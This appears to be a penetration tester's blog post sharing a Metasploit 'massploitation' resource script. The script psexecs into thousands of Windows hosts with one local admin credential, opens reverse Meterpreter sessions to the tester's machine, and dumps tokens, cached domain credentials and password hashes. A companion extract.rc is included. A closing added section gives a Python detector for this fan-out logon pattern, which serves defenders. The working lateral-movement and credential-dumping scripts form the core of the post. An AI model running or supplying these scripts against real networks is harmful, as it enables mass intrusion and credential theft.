On a pentest with a massive internal network, we managed to get local admin access to 22k machines using a single local account (verified with ncrack).
Obvious domain priv esc routes were shut down, so it was time to extend our control and information. I wanted hashes, cached domain creds and available tokens from each of these machines, so I put together the following Metasploit massploitation script. The main difference between this and the other solutions posted is that my box fell over with several thousand Meterpreter sessions open, so I wanted a way to automate connecting and pulling the info without needing all the sessions to be open at once.
In light of past and recent posts from mubix (one, two) and jcran, I thought I'd post the hack I used to connect to, and then run Metasploit post-exploitation modules across, several thousand machines. I still need to go through them all and merge them, but I thought I'd throw my hat in the ring. Thanks to mubix for his help on the job with some of it.
Essentially, there are three parts:
- massploitation.rc: the script run in the console (capturing the output is a good idea)
- The targets file: a list of targets, one per line
- extract.rc: run within each Meterpreter session by the massploitation script. Change this to whatever you need.
massploitation.rc
use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST <Local IP>
set LPORT 4444
set ExitOnSession false
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser <username>
set SMBPass <pass or hash>
set SMBDomain "."
set DisablePayloadHandler true
<ruby>
hostsfile = "<file containing hosts one per line>"
File.open(hostsfile).each do |host|
  host.strip!
  print_status("Targetting #{host}")
  self.run_single("set RHOST #{host}")
  self.run_single("exploit -j -z")
  # Poll up to 5 times (5 s apart) for a session to appear, then hand it to extract.rc
  flag = false
  count = 0
  while ( flag == false and count < 5 )
    if ( framework.sessions.length > 0 )
      self.run_single("sessions -s extract.rc")
      flag = true
      #self.run_single("sessions -K") #trying to resolve the race condition, this didn't work
    else
      count += 1
    end
    sleep(5)
  end
end
</ruby>
extract.rc
print_status(client.sys.config.sysinfo["Computer"])
print_status(client.sys.config.sysinfo["OS"])
client.console.run_single("load incognito")
client.console.run_single("list_tokens -u")
client.console.run_single("run post/windows/gather/cachedump")
client.console.run_single("hashdump")
client.console.run_single("exit") #Rather kill the session here
This isn't perfect: there is a race condition where it sometimes tries to run the Meterpreter script before the session is ready. Beyond adding the delay, I'll need to spend some time understanding Metasploit's threading.
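The whole run rides on one local admin account authenticating over the network to host after host from a single box, which is also the pattern a blue team can look for. The following is an added example, not part of the original post: it takes constructed, flattened Windows Security 4624 (network logon) events (the field names and sample values are assumptions) and alerts when a non-domain account fans out to several distinct hosts from one source within a short window.

```python
"""Added example (not from the original post): flag the 'same local admin on
every box' pattern behind this script, from constructed 4624 logon events."""
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, host, account, domain, src_ip, logon_type=3):
    # Constructed, flattened Windows Security 4624 event; field names are assumed.
    return {"ts": ts, "host": host, "event_id": 4624, "logon_type": logon_type,
            "account": account, "account_domain": domain, "src_ip": src_ip}

SAMPLE_EVENTS = [  # constructed data
    ev("2012-03-01T10:00:05", "WS01", "localadmin", "WS01", "10.0.0.9"),
    ev("2012-03-01T10:00:11", "WS02", "localadmin", "WS02", "10.0.0.9"),
    ev("2012-03-01T10:00:18", "WS03", "localadmin", "WS03", "10.0.0.9"),
    ev("2012-03-01T10:01:02", "WS04", "localadmin", "WS04", "10.0.0.9"),
    ev("2012-03-01T10:02:00", "WS01", "jsmith", "CORP", "10.0.0.9"),      # domain account
    ev("2012-03-01T10:02:30", "WS02", "jsmith", "CORP", "10.0.0.9"),
    ev("2012-03-01T10:03:00", "WS03", "jsmith", "CORP", "10.0.0.9"),
    ev("2012-03-01T10:05:00", "WS07", "localadmin", "WS07", "10.0.0.44"),  # single host
    ev("2012-03-01T13:00:00", "WS05", "localadmin", "WS05", "10.0.0.9"),   # outside window
]

def is_local_account(e):
    """A logon whose account domain is the target host itself, i.e. not a domain account."""
    return e["account_domain"].upper() == e["host"].upper()

def fanout_alerts(events, window=timedelta(minutes=10), min_hosts=3):
    """One alert per (account, src_ip) whose local-account network logons reach
    at least min_hosts distinct hosts inside any span of length `window`."""
    by_key = defaultdict(list)
    for e in events:
        if e["event_id"] == 4624 and e["logon_type"] == 3 and is_local_account(e):
            by_key[(e["account"].lower(), e["src_ip"])].append(
                (datetime.fromisoformat(e["ts"]), e["host"].upper()))
    alerts = []
    for (account, src_ip), hits in by_key.items():
        hits.sort()
        start, best = 0, set()
        for end, (ts, _host) in enumerate(hits):
            while ts - hits[start][0] > window:  # slide the window start forward
                start += 1
            hosts = {h for _, h in hits[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            alerts.append({"account": account, "src_ip": src_ip, "hosts": sorted(best)})
    return alerts
```

On the sample data `fanout_alerts(SAMPLE_EVENTS)` returns a single alert for localadmin from 10.0.0.9 covering WS01 to WS04; the domain account, the one-host source and the logon hours later do not trigger. Tune `window` and `min_hosts` to the environment, since legitimate imaging or patch tooling can produce the same shape.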